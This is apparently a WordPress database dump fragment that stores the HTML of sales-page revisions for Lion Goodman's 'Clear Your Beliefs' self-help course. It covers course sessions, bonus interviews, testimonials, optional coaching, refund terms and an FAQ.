Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:13:19', '2014-06-19 07:13:19', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1049, 2, '2014-06-19 02:06:28', '2014-06-19 07:06:28', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span 